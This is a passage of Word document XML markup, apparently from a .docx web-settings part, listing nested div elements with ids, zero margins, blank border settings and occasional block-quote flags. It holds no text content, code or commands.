      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="552929133">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="434517257">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="553124892">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="554582323">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="554702147">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="555891554">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1158616706">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="774131775">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1086003145">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="684669320">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="5196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336439">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1348169837">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1263758735">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1981302099">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1514106210">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="71450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82727">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1425345814">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1320305165">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1162233324">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1403521884">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="42507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1830">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="333923930">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1198196403">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="768698391">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="149831749">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2051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359756">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="557086932">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="558174317">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="559168203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1122846709">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="559176735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1319265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79678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74456">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="655912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9875228">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1745486715">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="560796975">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1132405313">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="935406071">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1845779176">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="13967482">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="205253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402114">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="918102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9341192">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1367293164">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1203903115">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1553686933">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="130646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15212">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1490903069">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="215438498">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2084180987">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="909315340">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1707481585">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="36348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5622">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1305355261">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="792141508">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1948611475">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="491289775">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="175990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52747">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1142769465">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="569081707">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
